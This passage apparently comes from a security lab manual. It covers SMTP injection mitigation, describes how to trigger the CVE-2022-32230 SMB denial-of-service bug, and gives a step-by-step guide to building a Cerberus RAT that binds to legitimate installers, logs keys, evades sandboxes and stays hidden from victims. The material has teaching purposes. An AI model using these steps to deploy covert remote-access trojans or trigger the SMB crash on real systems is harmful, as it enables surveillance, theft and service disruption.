Mitigation at the SMTP server level: Use a separate SMTP server for custom web applications.
On that server, you can limit your email throughput and block emails that have, for example,
more than 10 recipients. Set up alerts to warn the administrator about blocked attempts and any
other unusual conditions. Remove these limits only for trusted applications. While this will not
protect you against spear phishing through email injection, it will eliminate the risk of email
injections leading to mass mailing attacks, such as spam or phishing.
Experiment No 10.

Aim: Study of detection and prevention of security attack on Mobile OS

Theory:

Shivi Garg, Niyati Baliyan, Comparative analysis of Android and iOS from security viewpoint,
Computer Science Review, Volume 40, 2021, 100372, ISSN 1574-0137,
https://doi.org/10.1016/j.cosrev.2021.100372.
(https://www.sciencedirect.com/science/article/pii/S1574013721000125)

Use any reference paper to analyse security measures in Mobile OS.

Experiment No 11

Aim: Denial of Service Exploits-Windows Denial of Service SMBDie

Theory:

A denial of service vulnerability exists when Windows Search improperly handles objects in memory.
An attacker who successfully exploited the vulnerability could cause a remote denial of service
against a system.

To exploit the vulnerability, the attacker could send specially crafted messages to the Windows
Search service. Additionally, in an enterprise scenario, a remote unauthenticated attacker could
remotely trigger the vulnerability through a Server Message Block (SMB) connection.

The security update addresses the vulnerability by correcting how Windows Search handles objects
in memory.

Exploitation

CVE-2022-32230 is caused by a missing check in srv2!Smb2ValidateVolumeObjectsMatch to

verify that a pointer is not null before reading a PDEVICE_OBJECT from it and passing it to
IoGetBaseFileSystemDeviceObject. The following patch diff shows the function in question for
Windows 10 21H2 (unpatched version 10.0.19041.1566 on the left).

This function is called from the dispatch routine for an SMB2 QUERY_INFO request of the
FILE_INFO / FILE_NORMALIZED_NAME_INFORMATION class. Per the docs in MS-
SMB2 section 3.3.5.20.1 Handling SMB2_0_INFO_FILE,
FILE_NORMALIZED_NAME_INFORMATION is only available when the dialect is 3.1.1.

For FileNormalizedNameInformation information class requests, if not supported by the server

implementation<392>, or if Connection.Dialect is "2.0.2", "2.1" or "3.0.2", the server MUST fail
the request with STATUS_NOT_SUPPORTED.

To trigger this code path, a user would open any named pipe from the IPC$ share and make a
QUERY_INFO request for the FILE_NORMALIZED_NAME_INFORMATION class. This
typically requires user permissions or a non-default configuration enabling guest access. This is
not the case, however, for the noteworthy exception of domain controllers where there are
multiple named pipes that can be opened anonymously, such as netlogon. An alternative named
pipe that can be used but does typically require permissions is the srvsvc pipe.
Under normal circumstances, the FILE_NORMALIZED_NAME_INFORMATION class would
be used to query the normalized name information of a file that exists on disk. This differs from
the exploitation scenario which queries a named pipe.

A system that has applied the patch for this vulnerability will respond to the request with the
error STATUS_NOT_SUPPORTED.
Experiment No 12

Aim: Experimenting with Trojans (installing, deploying, controlling).

Theory:

RAT is used to remotely connect and manage single or multiple computers. RAT is one of
the most dangerous Trojan because it compromises features of all types of Trojans. It
provides an attacker with nearly unlimited access to host computer along with Screen
Capture, File management, shell control and device drivers control. RATs uses reverse
connections to connect remote system and hence are more likely to remain undetected.
They can hide themselves in process space of legitimate program and hence never appear
in task manager or system monitors.

A Trojan generally has two parts Client and Server or Master and Slave. We can say Server is
Slave and Client is Master. So a server side is installed on a remote host and the attacker
manipulates it with client software. In olden days making a Trojan was a job of master
programmer but now a days several Trojan building tools are available. Most of them
usually have same kinda interface so its quite easy to use any Trojan client once you have
used any one of them . Following is list of some well known Trojans and Trojan Building
Tools,

1.Casa RAT
2.Back Orifice
3.Bandook RAT
4.Dark Comet Rat
5.Cerberus
6.Cybergate
7.Blackshades
8.Poison Ivy
9.Schwarze Sonne RAT
10.Syndrome RAT
11.Team Viewer
12.Y3k RAT
13Snoopy
15.5p00f3r.N$ RAT
16.NetBus
17.SpyNet
18.P. Storrie RAT
19.Turkojan Gold
20.Bifrost
21.Lost Door
22.Beast
23.Shark
24.Sub7
25.Pain RAT
26.xHacker Pro RAT
27.Seed RAT
28.Optix Pro RAT
29.Dark Moon
30.NetDevil
31.Deeper RAT
32.MiniMo RAT

If you think the list is very big then I must tell you it's not complete nor it covered 25% of
RAT building tools.

Demonstration: How to create a RAT:Since there are several tools available and most of
them have same kinda interface we can select any RAT building tool for demonstration. So
here we select Cerberus Client to demonstrate working of RAT.

Type “Download Cerberus RAT” in Google search and download Cerberus RAT. Execute
Cerberus file and launch program. Accept EULA and following interface will be launched in
front of you.
To create server press new button.
As you can see there are several options are available in settings but for our demonstration
we will use most common settings. In “Basic Option” type your IP address and then press
“+”. In identification name of the server from which your client will identify to which server
it's listening, this name is given for your client to identify connection. No need to specify
what to put in connection password. Specify the port on which you'll like to listen. Please
keep note of this port since you'll have to configure client settings to receive information on
this port.
The next option is “Server Installation”. From “Directory Installation” you can select where
and in which name folder your RAT server will be installed. In “File Name” option you have
to specify name and extension of your server. Boot Methods gives you option to start your
server as “System Service” or “User Application” take your pick or leave them untouched.
“Anti-Debugging” function allows your RAT to bypass Virtualisation and Sandboxing.

From “Misc Options” you can activate key logging feature as well as you can select how your
RAT can hide itself in another process.
“Display Message” option gives you power to show custom message on victim's computer.
“Black List Item” option allows to set logic for execution of your RAT server with respect to
specific process and service. Mostly only advanced users use this feature.
“Overview” allows you look of features of your RAT. Now select an icon and press create
server to create server.
Now the add file function allows you to bind your RAT with any legitimate file most
probable is an executable installation file. To avoid detection don't use custom message box
and UN-check “Run in Visible Mode” option while creating server.

Configuring To Listen On Client: To configure Cerberus to listen on specific port select

options and put “Connection Password” and “Connection Ports” that were specified in
Server. Wait for victim to execute server and then just right click on listening server and play
with options.